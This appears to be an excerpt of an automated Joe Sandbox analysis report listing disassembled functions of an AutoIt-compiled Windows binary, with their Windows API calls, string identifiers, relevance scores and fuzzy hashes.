                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00EB273E
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EB286A
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EB28A9
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EB28B9
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EB2900
                                                      • GetClientRect.USER32(00000000,?), ref: 00EB290C
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EB2955
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB2964
                                                      • GetStockObject.GDI32(00000011), ref: 00EB2974
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EB2978
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EB2988
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB2991
                                                      • DeleteDC.GDI32(00000000), ref: 00EB299A
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EB29C6
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB29DD
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EB2A1D
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EB2A31
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EB2A42
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EB2A77
                                                      • GetStockObject.GDI32(00000011), ref: 00EB2A82
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EB2A8D
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EB2A97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: c2d67ad96ed82a55be8e1451e685b99517830db25fda5e2a80af739796f1874a
                                                      • Instruction ID: 3d921be10ea618138f284817a4d0b5345a535bdd579b8b10464424677c93f267
                                                      • Opcode Fuzzy Hash: c2d67ad96ed82a55be8e1451e685b99517830db25fda5e2a80af739796f1874a
                                                      • Instruction Fuzzy Hash: A0B14BB1A00219AFEB24DFA9CC49FAB7BA9FB08710F105119FA15E7290D770AD45CB94
                                                      Function 00EA4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA4AED
                                                      • GetDriveTypeW.KERNEL32(?,00ECCB68,?,\\.\,00ECCC08), ref: 00EA4BCA
                                                      • SetErrorMode.KERNEL32(00000000,00ECCB68,?,\\.\,00ECCC08), ref: 00EA4D36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 811b62b6b8ed5103f2a2375b1c70f7b0830534ecf3f84038451d5d7ca6bf7e83
                                                      • Instruction ID: b397de8addaba1499f6f2a845134c3b218cbabaa2a89d3aa608c44d8da7061f2
                                                      • Opcode Fuzzy Hash: 811b62b6b8ed5103f2a2375b1c70f7b0830534ecf3f84038451d5d7ca6bf7e83
                                                      • Instruction Fuzzy Hash: 6C61D3B12052099BDB04EF24C982AB8B7F0AB8A314B247415E50ABF2D1DBB2FD41DB51
                                                      Function 00EC73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00EC7421
                                                      • SetTextColor.GDI32(?,?), ref: 00EC7425
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC743B
                                                      • GetSysColor.USER32(0000000F), ref: 00EC7446
                                                      • CreateSolidBrush.GDI32(?), ref: 00EC744B
                                                      • GetSysColor.USER32(00000011), ref: 00EC7463
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EC7471
                                                      • SelectObject.GDI32(?,00000000), ref: 00EC7482
                                                      • SetBkColor.GDI32(?,00000000), ref: 00EC748B
                                                      • SelectObject.GDI32(?,?), ref: 00EC7498
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EC74B7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EC74CE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC74DB
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EC752A
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EC7554
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00EC7572
                                                      • DrawFocusRect.USER32(?,?), ref: 00EC757D
                                                      • GetSysColor.USER32(00000011), ref: 00EC758E
                                                      • SetTextColor.GDI32(?,00000000), ref: 00EC7596
                                                      • DrawTextW.USER32(?,00EC70F5,000000FF,?,00000000), ref: 00EC75A8
                                                      • SelectObject.GDI32(?,?), ref: 00EC75BF
                                                      • DeleteObject.GDI32(?), ref: 00EC75CA
                                                      • SelectObject.GDI32(?,?), ref: 00EC75D0
                                                      • DeleteObject.GDI32(?), ref: 00EC75D5
                                                      • SetTextColor.GDI32(?,?), ref: 00EC75DB
                                                      • SetBkColor.GDI32(?,?), ref: 00EC75E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: b5fbe0a0c5f4fb5a4edec64189697012144c2330d263c9d8f231b66afed7ab1d
                                                      • Instruction ID: 0fb65737a5ce81d4977c6a79916589c1b24b677b1b73cabed3d41a0c8966c939
                                                      • Opcode Fuzzy Hash: b5fbe0a0c5f4fb5a4edec64189697012144c2330d263c9d8f231b66afed7ab1d
                                                      • Instruction Fuzzy Hash: C5616072900218AFDB019FA5DC49EEE7FB9FB08320F244125F915BB2A1D7729942CF90
                                                      Function 00EC0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00EC1128
                                                      • GetDesktopWindow.USER32 ref: 00EC113D
                                                      • GetWindowRect.USER32(00000000), ref: 00EC1144
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC1199
                                                      • DestroyWindow.USER32(?), ref: 00EC11B9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EC11ED
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC120B
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC121D
                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00EC1232
                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EC1245
                                                      • IsWindowVisible.USER32(00000000), ref: 00EC12A1
                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EC12BC
                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EC12D0
                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC12E8
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00EC130E
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00EC1328
                                                      • CopyRect.USER32(?,?), ref: 00EC133F
                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EC13AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 205c39532a19e628475b9b75d9639b5732d4a1fc3a2320f8dec30c47d8867f00
                                                      • Instruction ID: 57b8213629eb31627d985a7fc4c1ead2900da539cf321b210a6bdfc56fb04a77
                                                      • Opcode Fuzzy Hash: 205c39532a19e628475b9b75d9639b5732d4a1fc3a2320f8dec30c47d8867f00
                                                      • Instruction Fuzzy Hash: 3BB1AC71604340AFD704DF65C989F6ABBE4FF85344F00995CF999AB262C732E846CB92
                                                      Function 00EC0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00EC02E5
                                                      • _wcslen.LIBCMT ref: 00EC031F
                                                      • _wcslen.LIBCMT ref: 00EC0389
                                                      • _wcslen.LIBCMT ref: 00EC03F1
                                                      • _wcslen.LIBCMT ref: 00EC0475
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EC04C5
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EC0504
                                                        • Part of subcall function 00E4F9F2: _wcslen.LIBCMT ref: 00E4F9FD
                                                        • Part of subcall function 00E9223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E92258
                                                        • Part of subcall function 00E9223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E9228A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 1103490817-719923060
                                                      • Opcode ID: 18b0a4b3c22e667f5b3bc688e3b7fc617a7ff48ddead56847810bfa4bc817a1f
                                                      • Instruction ID: fb3b6c0be4cd267add65f52ab04c58e6aa22728adc5271539488bc0777f556ad
                                                      • Opcode Fuzzy Hash: 18b0a4b3c22e667f5b3bc688e3b7fc617a7ff48ddead56847810bfa4bc817a1f
                                                      • Instruction Fuzzy Hash: 74E19E31208301DB8B18DF28C651E6AB7E6BFC8718F14695CF996BB2A1D731ED46CB41
                                                      Function 00E48891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E48968
                                                      • GetSystemMetrics.USER32(00000007), ref: 00E48970
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E4899B
                                                      • GetSystemMetrics.USER32(00000008), ref: 00E489A3
                                                      • GetSystemMetrics.USER32(00000004), ref: 00E489C8
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E489E5
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E489F5
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E48A28
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E48A3C
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00E48A5A
                                                      • GetStockObject.GDI32(00000011), ref: 00E48A76
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E48A81
                                                        • Part of subcall function 00E4912D: GetCursorPos.USER32(?), ref: 00E49141
                                                        • Part of subcall function 00E4912D: ScreenToClient.USER32(00000000,?), ref: 00E4915E
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000001), ref: 00E49183
                                                        • Part of subcall function 00E4912D: GetAsyncKeyState.USER32(00000002), ref: 00E4919D
                                                      • SetTimer.USER32(00000000,00000000,00000028,00E490FC), ref: 00E48AA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 71d5f4e3adff798e0be742b596f905cd1a25e3c8a2de819ea1a0b5352de5cebf
                                                      • Instruction ID: 050ed91910b5b37bf6bd79d8fc1e1c8f14fa5c0ec71d0170a9e6b96c8b349e16
                                                      • Opcode Fuzzy Hash: 71d5f4e3adff798e0be742b596f905cd1a25e3c8a2de819ea1a0b5352de5cebf
                                                      • Instruction Fuzzy Hash: 27B18A31A00209AFDB14DFA8DD45FAE3BB5FB48714F10522AFA19BB290DB71E941CB51
                                                      Function 00E90D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91114
                                                        • Part of subcall function 00E910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91120
                                                        • Part of subcall function 00E910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E9112F
                                                        • Part of subcall function 00E910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91136
                                                        • Part of subcall function 00E910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E9114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E90DF5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E90E29
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90E40
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E90E7A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E90E96
                                                      • GetLengthSid.ADVAPI32(?), ref: 00E90EAD
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E90EB5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E90EBC
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E90EDD
                                                      • CopySid.ADVAPI32(00000000), ref: 00E90EE4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E90F13
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E90F35
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E90F47
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90F6E
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90F75
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90F7E
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90F85
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E90F8E
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90F95
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E90FA1
                                                      • HeapFree.KERNEL32(00000000), ref: 00E90FA8
                                                        • Part of subcall function 00E91193: GetProcessHeap.KERNEL32(00000008,00E90BB1,?,00000000,?,00E90BB1,?), ref: 00E911A1
                                                        • Part of subcall function 00E91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E90BB1,?), ref: 00E911A8
                                                        • Part of subcall function 00E91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E90BB1,?), ref: 00E911B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: f33580f66be9014db90d3e3fce2d86974832829c54575487d3e3d0e298099b52
                                                      • Instruction ID: fbf41cd71e6864d022d9530df68e8c2b68e98fdc4bce43945d9bc8489015c9d0
                                                      • Opcode Fuzzy Hash: f33580f66be9014db90d3e3fce2d86974832829c54575487d3e3d0e298099b52
                                                      • Instruction Fuzzy Hash: 05715C72A0020AAFDF20DFA6DC45FAEBBB8FF04304F545125F919B6191D7319A4ACB60
                                                      Function 00EBC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC4BD
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ECCC08,00000000,?,00000000,?,?), ref: 00EBC544
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EBC5A4
                                                      • _wcslen.LIBCMT ref: 00EBC5F4
                                                      • _wcslen.LIBCMT ref: 00EBC66F
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EBC6B2
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EBC7C1
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EBC84D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBC881
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBC88E
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EBC960
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      • Opcode ID: 46f8aa209674a42d2f5c17d858a698b8a4f7b036944a49d374e5b213e65ae328
                                                      • Instruction ID: 6cd584e0fa9cc07b41ee2b16ef0f236fa7411fbdb2d2e0909057fd8e74c3474f
                                                      • Opcode Fuzzy Hash: 46f8aa209674a42d2f5c17d858a698b8a4f7b036944a49d374e5b213e65ae328
                                                      • Instruction Fuzzy Hash: 2E127D756082019FCB14DF14C885E6ABBE5EF88714F14985DF88AAB3A2DB31FD41CB81
                                                      Function 00EC091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00EC09C6
                                                      • _wcslen.LIBCMT ref: 00EC0A01
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC0A54
                                                      • _wcslen.LIBCMT ref: 00EC0A8A
                                                      • _wcslen.LIBCMT ref: 00EC0B06
                                                      • _wcslen.LIBCMT ref: 00EC0B81
                                                        • Part of subcall function 00E4F9F2: _wcslen.LIBCMT ref: 00E4F9FD
                                                        • Part of subcall function 00E92BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E92BFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      • Opcode ID: 857caca77c7fe60a91b287b8932d44561f93f92de21bab1f5e97a5533dc586a3
                                                      • Instruction ID: 70a128a318e7efc9bf082ee447164d0339537356ffdde19c441f950543ede1e2
                                                      • Opcode Fuzzy Hash: 857caca77c7fe60a91b287b8932d44561f93f92de21bab1f5e97a5533dc586a3
                                                      • Instruction Fuzzy Hash: 26E16B35208301DFCB14DF24C551A6AB7E2BF98718F14A95CF8967B262D732ED46CB81
                                                      Function 00EBC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      • Opcode ID: 5fd64020fc03b0826ac31cf9d8e5d2f0ca6b040ff73377c16e8cefbb125ced96
                                                      • Instruction ID: 12f90850be6c1adcbf1d2305f66dc7fc9ab42d9caadfc4955f712bf2794f28a1
                                                      • Opcode Fuzzy Hash: 5fd64020fc03b0826ac31cf9d8e5d2f0ca6b040ff73377c16e8cefbb125ced96
                                                      • Instruction Fuzzy Hash: 1071E73261812A8BCB10DE7CCD525FF7791ABA0758F352529FC96B7284E631CD85C7A0
                                                      Function 00EC833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EC835A
                                                      • _wcslen.LIBCMT ref: 00EC836E
                                                      • _wcslen.LIBCMT ref: 00EC8391
                                                      • _wcslen.LIBCMT ref: 00EC83B4
